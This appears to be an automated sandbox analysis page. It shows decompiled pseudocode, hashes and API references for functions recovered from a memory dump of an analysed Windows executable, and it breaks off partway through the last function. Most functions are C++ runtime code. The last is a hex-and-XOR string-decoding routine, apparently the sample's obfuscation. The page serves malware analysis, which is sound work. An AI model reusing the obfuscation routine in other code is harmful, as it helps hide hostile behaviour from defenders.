Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _memsetlstrcat$CloseOpenQueryValue
String ID: \config\
API String ID: 1663104428-327132148
Opcode ID: 8213d399f38da7d56d704881dbf84b946b57fd3c506c3f89bbde85b26395bb78
Instruction ID: 66b0853318ecd71cb5deb3b3955ede094222da856f97001564fdd619268c767b
Opcode Fuzzy Hash: 8213d399f38da7d56d704881dbf84b946b57fd3c506c3f89bbde85b26395bb78
Instruction Fuzzy Hash: 5E31B4B5500318ABCB10EFA0DC85FDA737CEB58705F1045ADF64597182DAB4AA84CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00419240 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00419240(char _a4) {
				intOrPtr _v8;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v40;
				void* __edi;
				signed int _t29;
				intOrPtr _t33;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t45;
				signed int _t48;
				signed int _t49;
				char _t51;
				intOrPtr _t54;
				signed int _t70;
				intOrPtr _t71;
				signed int _t73;

				_push(0xffffffff);
				_push(E0043ED68);
				_push( *[fs:0x0]);
				_t29 =  *0x451f00; // 0xc21d6f0a
				_push(_t29 ^ _t73);
				 *[fs:0x0] =  &_v16;
				E00429A1B( &_v28, 0);
				_t51 =  *0x463e10;
				_v8 = 0;
				_v20 = _t51;
				if( *0x463e14 == 0) {
					E00429A1B( &_v24, 0);
					if( *0x463e14 == 0) {
						_t48 =  *0x464a08; // 0x3
						_t49 = _t48 + 1;
						 *0x464a08 = _t49;
						 *0x463e14 = _t49;
					}
					E00429A43( &_v24);
				}
				_t67 = _a4;
				_t70 =  *0x463e14;
				_t33 =  *_a4;
				if(_t70 >=  *((intOrPtr*)(_t33 + 0xc))) {
					_t54 = 0;
					goto L6;
				} else {
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t33 + 8)) + _t70 * 4));
					if(_t54 != 0) {
						L10:
						_t71 = _t54;
						L11:
						if(_t71 != 0) {
							L19:
							_v8 = 0xffffffff;
							E00429A43( &_v28);
							 *[fs:0x0] = _v16;
							return _t71;
						}
						L12:
						if(_t51 == 0) {
							_t37 = E00418D00(_t54, _t67,  &_v20, _t67);
							__eflags = _t37 - 0xffffffff;
							if(_t37 == 0xffffffff) {
								E0042BFB5( &_v40, "bad cast");
								E0042C5C1( &_v40, 0x44c070);
							}
							_t71 = _v20;
							 *0x463e10 = _t71;
							E00429A1B( &_a4, 0);
							_t39 =  *((intOrPtr*)(_t71 + 4));
							__eflags = _t39 - 0xffffffff;
							if(_t39 < 0xffffffff) {
								_t42 = _t39 + 1;
								__eflags = _t42;
								 *((intOrPtr*)(_t71 + 4)) = _t42;
							}
							E00429A43( &_a4);
							E00429A6F( &_a4, __eflags, _t71);
						} else {
							_t71 = _t51;
						}
						goto L19;
					}
					L6:
					if( *((char*)(_t33 + 0x14)) == 0) {
						goto L10;
					}
					_t45 = E00429AE6();
					if(_t70 >=  *((intOrPtr*)(_t45 + 0xc))) {
						goto L12;
					}
					_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)) + _t70 * 4));
					goto L11;
				}
			}

0x00419243
0x00419245
0x00419250
0x00419257
0x0041925e
0x00419262
0x0041926d
0x00419279
0x0041927f
0x00419286
0x00419289
0x00419290
0x0041929c
0x0041929e
0x004192a3
0x004192a4
0x004192a9
0x004192a9
0x004192b1
0x004192b1
0x004192b6
0x004192b9
0x004192bf
0x004192c4
0x004192e8
0x00000000
0x004192c6
0x004192c9
0x004192ce
0x004192ec
0x004192ec
0x004192ee
0x004192f0
0x00419357
0x0041935a
0x00419361
0x0041936b
0x00419379
0x00419379
0x004192f2
0x004192f4
0x004192ff
0x00419307
0x0041930a
0x00419314
0x00419322
0x00419322
0x00419327
0x0041932f
0x00419335
0x0041933a
0x0041933d
0x00419340
0x00419342
0x00419342
0x00419343
0x00419343
0x00419349
0x0041934f
0x004192f6
0x004192f6
0x004192f6
0x00000000
0x004192f4
0x004192d0
0x004192d4
0x00000000
0x00000000
0x004192d6
0x004192de
0x00000000
0x00000000
0x004192e3
0x00000000
0x004192e3

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0041926D
std::_Lockit::_Lockit.LIBCPMT ref: 00419290
std::bad_exception::bad_exception.LIBCMT ref: 00419314
__CxxThrowException@8.LIBCMT ref: 00419322
std::_Lockit::_Lockit.LIBCPMT ref: 00419335
std::locale::facet::_Facet_Register.LIBCPMT ref: 0041934F

Strings

bad cast, xrefs: 0041930C

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 9af3b33f35b097bbb1b16a07ad732041fd072657f04e7e8ebe5ae875e81a1729
Instruction ID: 7c62861d8f7fbcd0b7b7195b758d3b73ca926edf215cbfef92d4cacf7b2e6c08
Opcode Fuzzy Hash: 9af3b33f35b097bbb1b16a07ad732041fd072657f04e7e8ebe5ae875e81a1729
Instruction Fuzzy Hash: BE311731A002549FCB14DF54E991BEEB7B4EB04324F50056FE812A72D1DB79AE40CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 00421830 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00421830(char _a4) {
				intOrPtr _v8;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v40;
				void* __edi;
				signed int _t29;
				intOrPtr _t33;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t45;
				signed int _t48;
				signed int _t49;
				char _t51;
				intOrPtr _t54;
				signed int _t70;
				intOrPtr _t71;
				signed int _t73;

				_push(0xffffffff);
				_push(E0043ED68);
				_push( *[fs:0x0]);
				_t29 =  *0x451f00; // 0xc21d6f0a
				_push(_t29 ^ _t73);
				 *[fs:0x0] =  &_v16;
				E00429A1B( &_v28, 0);
				_t51 =  *0x464680; // 0x25c9fd0
				_v8 = 0;
				_v20 = _t51;
				if( *0x464688 == 0) {
					E00429A1B( &_v24, 0);
					if( *0x464688 == 0) {
						_t48 =  *0x464a08; // 0x3
						_t49 = _t48 + 1;
						 *0x464a08 = _t49;
						 *0x464688 = _t49;
					}
					E00429A43( &_v24);
				}
				_t67 = _a4;
				_t70 =  *0x464688; // 0x2
				_t33 =  *_a4;
				if(_t70 >=  *((intOrPtr*)(_t33 + 0xc))) {
					_t54 = 0;
					goto L6;
				} else {
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t33 + 8)) + _t70 * 4));
					if(_t54 != 0) {
						L10:
						_t71 = _t54;
						L11:
						if(_t71 != 0) {
							L19:
							_v8 = 0xffffffff;
							E00429A43( &_v28);
							 *[fs:0x0] = _v16;
							return _t71;
						}
						L12:
						if(_t51 == 0) {
							_t37 = E004215E0(_t54, _t65, _t67,  &_v20, _t67);
							__eflags = _t37 - 0xffffffff;
							if(_t37 == 0xffffffff) {
								E0042BFB5( &_v40, "bad cast");
								E0042C5C1( &_v40, 0x44c070);
							}
							_t71 = _v20;
							 *0x464680 = _t71;
							E00429A1B( &_a4, 0);
							_t39 =  *((intOrPtr*)(_t71 + 4));
							__eflags = _t39 - 0xffffffff;
							if(_t39 < 0xffffffff) {
								_t42 = _t39 + 1;
								__eflags = _t42;
								 *((intOrPtr*)(_t71 + 4)) = _t42;
							}
							E00429A43( &_a4);
							E00429A6F( &_a4, __eflags, _t71);
						} else {
							_t71 = _t51;
						}
						goto L19;
					}
					L6:
					if( *((char*)(_t33 + 0x14)) == 0) {
						goto L10;
					}
					_t45 = E00429AE6();
					if(_t70 >=  *((intOrPtr*)(_t45 + 0xc))) {
						goto L12;
					}
					_t65 =  *((intOrPtr*)(_t45 + 8));
					_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)) + _t70 * 4));
					goto L11;
				}
			}

0x00421833
0x00421835
0x00421840
0x00421847
0x0042184e
0x00421852
0x0042185d
0x00421869
0x0042186f
0x00421876
0x00421879
0x00421880
0x0042188c
0x0042188e
0x00421893
0x00421894
0x00421899
0x00421899
0x004218a1
0x004218a1
0x004218a6
0x004218a9
0x004218af
0x004218b4
0x004218d8
0x00000000
0x004218b6
0x004218b9
0x004218be
0x004218dc
0x004218dc
0x004218de
0x004218e0
0x00421947
0x0042194a
0x00421951
0x0042195b
0x00421969
0x00421969
0x004218e2
0x004218e4
0x004218ef
0x004218f7
0x004218fa
0x00421904
0x00421912
0x00421912
0x00421917
0x0042191f
0x00421925
0x0042192a
0x0042192d
0x00421930
0x00421932
0x00421932
0x00421933
0x00421933
0x00421939
0x0042193f
0x004218e6
0x004218e6
0x004218e6
0x00000000
0x004218e4
0x004218c0
0x004218c4
0x00000000
0x00000000
0x004218c6
0x004218ce
0x00000000
0x00000000
0x004218d0
0x004218d3
0x00000000
0x004218d3

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0042185D
std::_Lockit::_Lockit.LIBCPMT ref: 00421880
std::bad_exception::bad_exception.LIBCMT ref: 00421904
__CxxThrowException@8.LIBCMT ref: 00421912
std::_Lockit::_Lockit.LIBCPMT ref: 00421925
std::locale::facet::_Facet_Register.LIBCPMT ref: 0042193F

Strings

bad cast, xrefs: 004218FC

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: c7be3358f743336a96d47334ae9cc4746313a86c9c262bea8452c9149d255fc0
Instruction ID: 776c7b66135d832d0611187baa6e6923692c08ba8e574b33be2329c5c0108540
Opcode Fuzzy Hash: c7be3358f743336a96d47334ae9cc4746313a86c9c262bea8452c9149d255fc0
Instruction Fuzzy Hash: 4E310631B002249FCF14EF55F881BAE7774EB11724F91012FE811A72A1EB78AE40CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00418BC0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00418BC0(char _a4) {
				intOrPtr _v8;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v40;
				void* __edi;
				signed int _t29;
				intOrPtr _t33;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t45;
				signed int _t48;
				signed int _t49;
				char _t51;
				intOrPtr _t54;
				signed int _t70;
				intOrPtr _t71;
				signed int _t73;

				_push(0xffffffff);
				_push(E0043ED68);
				_push( *[fs:0x0]);
				_t29 =  *0x451f00; // 0xc21d6f0a
				_push(_t29 ^ _t73);
				 *[fs:0x0] =  &_v16;
				E00429A1B( &_v28, 0);
				_t51 =  *0x463e0c;
				_v8 = 0;
				_v20 = _t51;
				if( *0x464a0c == 0) {
					E00429A1B( &_v24, 0);
					if( *0x464a0c == 0) {
						_t48 =  *0x464a08; // 0x3
						_t49 = _t48 + 1;
						 *0x464a08 = _t49;
						 *0x464a0c = _t49;
					}
					E00429A43( &_v24);
				}
				_t67 = _a4;
				_t70 =  *0x464a0c; // 0x1
				_t33 =  *_a4;
				if(_t70 >=  *((intOrPtr*)(_t33 + 0xc))) {
					_t54 = 0;
					goto L6;
				} else {
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t33 + 8)) + _t70 * 4));
					if(_t54 != 0) {
						L10:
						_t71 = _t54;
						L11:
						if(_t71 != 0) {
							L19:
							_v8 = 0xffffffff;
							E00429A43( &_v28);
							 *[fs:0x0] = _v16;
							return _t71;
						}
						L12:
						if(_t51 == 0) {
							_t37 = E004188D0(_t54, _t67,  &_v20, _t67);
							__eflags = _t37 - 0xffffffff;
							if(_t37 == 0xffffffff) {
								E0042BFB5( &_v40, "bad cast");
								E0042C5C1( &_v40, 0x44c070);
							}
							_t71 = _v20;
							 *0x463e0c = _t71;
							E00429A1B( &_a4, 0);
							_t39 =  *((intOrPtr*)(_t71 + 4));
							__eflags = _t39 - 0xffffffff;
							if(_t39 < 0xffffffff) {
								_t42 = _t39 + 1;
								__eflags = _t42;
								 *((intOrPtr*)(_t71 + 4)) = _t42;
							}
							E00429A43( &_a4);
							E00429A6F( &_a4, __eflags, _t71);
						} else {
							_t71 = _t51;
						}
						goto L19;
					}
					L6:
					if( *((char*)(_t33 + 0x14)) == 0) {
						goto L10;
					}
					_t45 = E00429AE6();
					if(_t70 >=  *((intOrPtr*)(_t45 + 0xc))) {
						goto L12;
					}
					_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)) + _t70 * 4));
					goto L11;
				}
			}

0x00418bc3
0x00418bc5
0x00418bd0
0x00418bd7
0x00418bde
0x00418be2
0x00418bed
0x00418bf9
0x00418bff
0x00418c06
0x00418c09
0x00418c10
0x00418c1c
0x00418c1e
0x00418c23
0x00418c24
0x00418c29
0x00418c29
0x00418c31
0x00418c31
0x00418c36
0x00418c39
0x00418c3f
0x00418c44
0x00418c68
0x00000000
0x00418c46
0x00418c49
0x00418c4e
0x00418c6c
0x00418c6c
0x00418c6e
0x00418c70
0x00418cd7
0x00418cda
0x00418ce1
0x00418ceb
0x00418cf9
0x00418cf9
0x00418c72
0x00418c74
0x00418c7f
0x00418c87
0x00418c8a
0x00418c94
0x00418ca2
0x00418ca2
0x00418ca7
0x00418caf
0x00418cb5
0x00418cba
0x00418cbd
0x00418cc0
0x00418cc2
0x00418cc2
0x00418cc3
0x00418cc3
0x00418cc9
0x00418ccf
0x00418c76
0x00418c76
0x00418c76
0x00000000
0x00418c74
0x00418c50
0x00418c54
0x00000000
0x00000000
0x00418c56
0x00418c5e
0x00000000
0x00000000
0x00418c63
0x00000000
0x00418c63

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00418BED
std::_Lockit::_Lockit.LIBCPMT ref: 00418C10
std::bad_exception::bad_exception.LIBCMT ref: 00418C94
__CxxThrowException@8.LIBCMT ref: 00418CA2
std::_Lockit::_Lockit.LIBCPMT ref: 00418CB5
std::locale::facet::_Facet_Register.LIBCPMT ref: 00418CCF

Strings

h<dD, xrefs: 00418C8C

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: h<dD
API String ID: 2427920155-2189899566
Opcode ID: e69ff8cfa67ab4e0b7e8c4978c9f2030a0fe878618c05fc059f56ad5341e3728
Instruction ID: da0b2e4362aa6f1f157ddb034672fe227ac1084ec9c138f01a4eec21651ff4cb
Opcode Fuzzy Hash: e69ff8cfa67ab4e0b7e8c4978c9f2030a0fe878618c05fc059f56ad5341e3728
Instruction Fuzzy Hash: 7831D571A012549FCB14DF55E981BEE7774EB04724F50422FE811A7291EF78AE40CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 00421BB0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00421BB0(char _a4) {
				intOrPtr _v8;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v40;
				void* __edi;
				signed int _t29;
				intOrPtr _t33;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t45;
				signed int _t48;
				signed int _t49;
				char _t51;
				intOrPtr _t54;
				signed int _t70;
				intOrPtr _t71;
				signed int _t73;

				_push(0xffffffff);
				_push(E0043ED68);
				_push( *[fs:0x0]);
				_t29 =  *0x451f00; // 0xc21d6f0a
				_push(_t29 ^ _t73);
				 *[fs:0x0] =  &_v16;
				E00429A1B( &_v28, 0);
				_t51 =  *0x464684; // 0x25c9948
				_v8 = 0;
				_v20 = _t51;
				if( *0x46468c == 0) {
					E00429A1B( &_v24, 0);
					if( *0x46468c == 0) {
						_t48 =  *0x464a08; // 0x3
						_t49 = _t48 + 1;
						 *0x464a08 = _t49;
						 *0x46468c = _t49;
					}
					E00429A43( &_v24);
				}
				_t67 = _a4;
				_t70 =  *0x46468c; // 0x3
				_t33 =  *_a4;
				if(_t70 >=  *((intOrPtr*)(_t33 + 0xc))) {
					_t54 = 0;
					goto L6;
				} else {
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t33 + 8)) + _t70 * 4));
					if(_t54 != 0) {
						L10:
						_t71 = _t54;
						L11:
						if(_t71 != 0) {
							L19:
							_v8 = 0xffffffff;
							E00429A43( &_v28);
							 *[fs:0x0] = _v16;
							return _t71;
						}
						L12:
						if(_t51 == 0) {
							_t37 = E00421970(_t54, _t67,  &_v20, _t67);
							__eflags = _t37 - 0xffffffff;
							if(_t37 == 0xffffffff) {
								E0042BFB5( &_v40, "bad cast");
								E0042C5C1( &_v40, 0x44c070);
							}
							_t71 = _v20;
							 *0x464684 = _t71;
							E00429A1B( &_a4, 0);
							_t39 =  *((intOrPtr*)(_t71 + 4));
							__eflags = _t39 - 0xffffffff;
							if(_t39 < 0xffffffff) {
								_t42 = _t39 + 1;
								__eflags = _t42;
								 *((intOrPtr*)(_t71 + 4)) = _t42;
							}
							E00429A43( &_a4);
							E00429A6F( &_a4, __eflags, _t71);
						} else {
							_t71 = _t51;
						}
						goto L19;
					}
					L6:
					if( *((char*)(_t33 + 0x14)) == 0) {
						goto L10;
					}
					_t45 = E00429AE6();
					if(_t70 >=  *((intOrPtr*)(_t45 + 0xc))) {
						goto L12;
					}
					_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)) + _t70 * 4));
					goto L11;
				}
			}

0x00421bb3
0x00421bb5
0x00421bc0
0x00421bc7
0x00421bce
0x00421bd2
0x00421bdd
0x00421be9
0x00421bef
0x00421bf6
0x00421bf9
0x00421c00
0x00421c0c
0x00421c0e
0x00421c13
0x00421c14
0x00421c19
0x00421c19
0x00421c21
0x00421c21
0x00421c26
0x00421c29
0x00421c2f
0x00421c34
0x00421c58
0x00000000
0x00421c36
0x00421c39
0x00421c3e
0x00421c5c
0x00421c5c
0x00421c5e
0x00421c60
0x00421cc7
0x00421cca
0x00421cd1
0x00421cdb
0x00421ce9
0x00421ce9
0x00421c62
0x00421c64
0x00421c6f
0x00421c77
0x00421c7a
0x00421c84
0x00421c92
0x00421c92
0x00421c97
0x00421c9f
0x00421ca5
0x00421caa
0x00421cad
0x00421cb0
0x00421cb2
0x00421cb2
0x00421cb3
0x00421cb3
0x00421cb9
0x00421cbf
0x00421c66
0x00421c66
0x00421c66
0x00000000
0x00421c64
0x00421c40
0x00421c44
0x00000000
0x00000000
0x00421c46
0x00421c4e
0x00000000
0x00000000
0x00421c53
0x00000000
0x00421c53

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00421BDD
std::_Lockit::_Lockit.LIBCPMT ref: 00421C00
std::bad_exception::bad_exception.LIBCMT ref: 00421C84
__CxxThrowException@8.LIBCMT ref: 00421C92
std::_Lockit::_Lockit.LIBCPMT ref: 00421CA5
std::locale::facet::_Facet_Register.LIBCPMT ref: 00421CBF

Strings

bad cast, xrefs: 00421C7C

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: afb029c7a59b3a968bf14bd3c10c4430f9cd751093eac674d54b07690446d49d
Instruction ID: d8ef8b3889bbc31047d4a6be1547acfbca9ca0e47e906a5ea08521afe793017f
Opcode Fuzzy Hash: afb029c7a59b3a968bf14bd3c10c4430f9cd751093eac674d54b07690446d49d
Instruction Fuzzy Hash: C7312B75B402649FCF14DF56E841BAE7774EB11324F90422FE812A72A1EB786D00CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00404980 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00404980(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr* _t30;
				char* _t36;
				intOrPtr* _t49;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr* _t52;
				intOrPtr* _t56;
				intOrPtr* _t57;
				signed int _t59;
				intOrPtr _t66;
				intOrPtr* _t69;

				_t49 = __ecx;
				_t22 = _a8;
				_t69 = __ecx;
				if(_t22 == 0) {
					L12:
					_t23 =  *((intOrPtr*)(_t69 + 0x10));
					_t44 = _a4;
					if(_t23 < _a4) {
						_t23 = E004297E6("invalid string position");
					}
					_t50 = _a12;
					if((_t59 | 0xffffffff) - _t23 <= _t50) {
						_t23 = E00429799("string too long");
					}
					if(_t50 == 0) {
						L37:
						return _t69;
					} else {
						_t66 = _t23 + _t50;
						if(_t66 > 0xfffffffe) {
							_t23 = E00429799("string too long");
						}
						_t51 =  *((intOrPtr*)(_t69 + 0x14));
						if(_t51 >= _t66) {
							if(_t66 != 0) {
								goto L21;
							} else {
								 *((intOrPtr*)(_t69 + 0x10)) = _t66;
								if(_t51 < 0x10) {
									_t36 = _t69;
									 *_t36 = 0;
									return _t36;
								} else {
									 *((char*)( *_t69)) = 0;
									return _t69;
								}
							}
						} else {
							E004044F0(_t69, _t66, _t23);
							if(_t66 == 0) {
								goto L37;
							} else {
								L21:
								_t25 =  *((intOrPtr*)(_t69 + 0x14));
								if(_t25 < 0x10) {
									_t52 = _t69;
								} else {
									_t52 =  *_t69;
								}
								if(_t25 < 0x10) {
									_t26 = _t69;
								} else {
									_t26 =  *_t69;
								}
								E0042C040(_t26 + _t44 + _a12, _t52 + _t44,  *((intOrPtr*)(_t69 + 0x10)) - _t44);
								if( *((intOrPtr*)(_t69 + 0x14)) < 0x10) {
									_t30 = _t69;
								} else {
									_t30 =  *_t69;
								}
								E0042B8D0(_t30 + _t44, _a8, _a12);
								 *((intOrPtr*)(_t69 + 0x10)) = _t66;
								if( *((intOrPtr*)(_t69 + 0x14)) < 0x10) {
									 *((char*)(_t69 + _t66)) = 0;
									goto L37;
								} else {
									 *((char*)( *_t69 + _t66)) = 0;
									return _t69;
								}
							}
						}
					}
				} else {
					_t59 =  *(__ecx + 0x14);
					if(_t59 >= 0x10) {
						_t49 =  *__ecx;
					}
					if(_t22 < _t49) {
						goto L12;
					} else {
						if(_t59 < 0x10) {
							_t56 = _t69;
						} else {
							_t56 =  *_t69;
						}
						if( *((intOrPtr*)(_t69 + 0x10)) + _t56 <= _t22) {
							goto L12;
						} else {
							if(_t59 < 0x10) {
								_t57 = _t69;
							} else {
								_t57 =  *_t69;
							}
							_push(_a12);
							return L00404800(_t69, _a4, _t69, _t22 - _t57);
						}
					}
				}
			}

0x00404980
0x00404983
0x00404988
0x0040498c
0x004049d4
0x004049d4
0x004049d8
0x004049dd
0x004049e4
0x004049e4
0x004049e9
0x004049f3
0x004049fa
0x004049fa
0x00404a01
0x00404ac4
0x00404aca
0x00404a07
0x00404a07
0x00404a0d
0x00404a14
0x00404a14
0x00404a19
0x00404a1e
0x00404a3f
0x00000000
0x00404a41
0x00404a41
0x00404a47
0x00404a58
0x00404a5b
0x00404a60
0x00404a49
0x00404a4c
0x00404a54
0x00404a54
0x00404a47
0x00404a20
0x00404a24
0x00404a2b
0x00000000
0x00404a31
0x00404a31
0x00404a31
0x00404a37
0x00404a63
0x00404a39
0x00404a39
0x00404a39
0x00404a68
0x00404a6e
0x00404a6a
0x00404a6a
0x00404a6a
0x00404a7f
0x00404a8b
0x00404a91
0x00404a8d
0x00404a8d
0x00404a8d
0x00404a9e
0x00404aaa
0x00404aad
0x00404ac0
0x00000000
0x00404aaf
0x00404ab2
0x00404abb
0x00404abb
0x00404aad
0x00404a2b
0x00404a1e
0x0040498e
0x0040498e
0x00404994
0x00404996
0x00404996
0x0040499a
0x00000000
0x0040499c
0x0040499f
0x004049a5
0x004049a1
0x004049a1
0x004049a1
0x004049ae
0x00000000
0x004049b0
0x004049b3
0x004049b9
0x004049b5
0x004049b5
0x004049b5
0x004049be
0x004049d1
0x004049d1
0x004049ae
0x0040499a

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004049E4
std::_Xinvalid_argument.LIBCPMT ref: 004049FA
std::_Xinvalid_argument.LIBCPMT ref: 00404A14
_memmove.LIBCMT ref: 00404A7F

Strings

string too long, xrefs: 00404838, 00404856, 004049F5, 00404A0F
invalid string position, xrefs: 00404967, 004049DF

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: fa3187340453c04dda1cb010e1ec21016f05ddaa66bcc26b91d7bd30c7b9f9f9
Instruction ID: 940e5c54a353a9e3790fa11271fd88ac213f7541a2f988994fd15f713ad5115d
Opcode Fuzzy Hash: fa3187340453c04dda1cb010e1ec21016f05ddaa66bcc26b91d7bd30c7b9f9f9
Instruction Fuzzy Hash: 6D41D5B23402108BDB24DE6DE980A6FB3AAEBD5710B20093FE651D77C1C778AC40879D

Uniqueness

Uniqueness Score: -1.00%

Function 0041A030 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E0041A030(char* _a4, void** _a8, long* _a12) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v68;
				char _v96;
				void** _v100;
				long* _v104;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				char _t34;
				char _t35;
				signed int _t37;
				void* _t40;
				void* _t45;
				void* _t47;
				void* _t49;
				void* _t50;
				intOrPtr* _t51;
				char* _t57;
				void* _t58;
				char _t60;
				char _t73;
				void* _t76;
				long _t77;
				signed int _t79;
				void* _t80;
				signed int _t81;
				signed int _t85;

				_push(0xffffffff);
				_push(E0043EF18);
				_push( *[fs:0x0]);
				_t30 =  *0x451f00; // 0xc21d6f0a
				_t31 = _t30 ^ _t85;
				_v20 = _t31;
				_push(_t31);
				 *[fs:0x0] =  &_v16;
				_t73 = "0123456789ABCDEF"; // 0x33323130
				_t57 = _a4;
				_v100 = _a8;
				_t34 = "456789ABCDEF"; // 0x37363534
				_v104 = _a12;
				_t60 = "89ABCDEF"; // 0x42413938
				_v40 = _t73;
				_t74 =  *0x4464a8; // 0x46454443
				_v36 = _t34;
				_t35 =  *0x4464ac; // 0x0
				_push(_t57);
				_v32 = _t60;
				_v28 = _t74;
				_v24 = _t35;
				_t79 = 0;
				if( *0x464758() <= 0) {
					L8:
					_t37 = _t79;
				} else {
					_t40 = E0042D180( &_v40,  *_t57);
					if(_t40 != 0) {
						_t74 =  &_v40;
						_t81 = _t40 -  &_v40 << 4;
						_t15 = _t57 + 1; // 0x6c697a6f
						_t45 = E0042D180( &_v40,  *_t15);
						if(_t45 == 0) {
							goto L2;
						} else {
							_t79 =  !(_t81 + _t45 -  &_v40 ^ 0xffffffa3) & 0x000000ff;
							_t47 =  *0x464758(_t57);
							_t74 = _v104;
							_t18 = _t47 - 1; // -1
							_t77 = _t18;
							 *_v104 = _t77;
							_t49 = HeapAlloc(GetProcessHeap(), 8, _t77);
							 *_v100 = _t49;
							if(_t49 == 0) {
								goto L2;
							} else {
								_t50 = E00404CC0( &_v68, _t57);
								_t74 =  &_v96;
								_v8 = 0;
								_t51 = E0040D070(_t50,  &_v96, 2, 0xffffffff);
								if( *((intOrPtr*)(_t51 + 0x14)) >= 0x10) {
									_t51 =  *_t51;
								}
								E0042C3A1( *_v100, _t77, _t51);
								E0040A450( &_v96);
								E0040A450( &_v68);
								goto L8;
							}
						}
					} else {
						L2:
						_t37 = 0;
					}
				}
				 *[fs:0x0] = _v16;
				_pop(_t76);
				_pop(_t80);
				_pop(_t58);
				return E0042A36A(_t37, _t58, _v20 ^ _t85, _t74, _t76, _t80);
			}

0x0041a033
0x0041a035
0x0041a040
0x0041a044
0x0041a049
0x0041a04b
0x0041a051
0x0041a055
0x0041a05e
0x0041a067
0x0041a06a
0x0041a06d
0x0041a072
0x0041a075
0x0041a07b
0x0041a07e
